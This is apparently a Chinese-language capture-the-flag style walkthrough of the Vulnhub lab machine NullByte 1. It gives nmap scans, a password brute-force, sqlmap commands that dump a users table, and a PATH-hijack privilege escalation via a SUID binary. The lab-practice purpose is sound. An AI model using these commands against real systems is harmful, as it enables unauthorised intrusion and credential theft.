Vulnhub靶机：NULLBYTE_ 1

介绍

系列：NullByte（此系列共1台）
发布日期：2015 年 8 月 1 日
难度：初级
运行环境：Virtualbox
目标：取得Root权限
学习：

• nmap漏扫脚本
• 暴力破解
• SQL注入
• 环境变量提权

靶机地址：https://www.vulnhub.com/entry/nullbyte-1,126/

信息收集

netdiscover主机发现

sudo netdiscover -i eth1 -r 192.168.56.0/24

主机信息探测
发现SSH运行在777端口

nmap -p- 192.168.56.109
nmap -p 80,111,777,56412 -A 192.168.56.109
nmap -p 80,111,777,56412 --script=vuln 192.168.56.109

网站探测

打开网站就是一个图片，页面源代码中有图片地址。

目录爆破没有发现有价值的信息，还是先看看图片吧，结果发现了一串字符。

wget http://192.168.56.109/main.gif
exiftool main.gif

尝试后发现这是一个网站目录，看起来需要一个密码才能登录进去。

暴力破解

使用BurpSuite进行暴力破解，字典选用的是rockyou，但是这个字典又太大，因此使用了SecLists中的\SecLists-2023.1\Passwords\Leaked-Databases\rockyou-70.txt
爆破出密码是：elite

SQL注入

登录后发现存在SQL注入，检查发现不存在cookie，那就好办了，直接sqlmap跑

sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --tables
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --columns
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --dump

这段密文没法直接解出来，尝试后发现可以base64解码，最后解出对应明文是：omega

SSH登录

提权

根据命令行的历史记录，很轻松就找到了一个可疑的可执行文件。尝试运行，发现这个文件会调用其他文件

方式1

复制一个终端，并篡改环境变量

./procwatch
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
./procwatch

方式2

本地新建一个终端，并篡改环境变量

echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch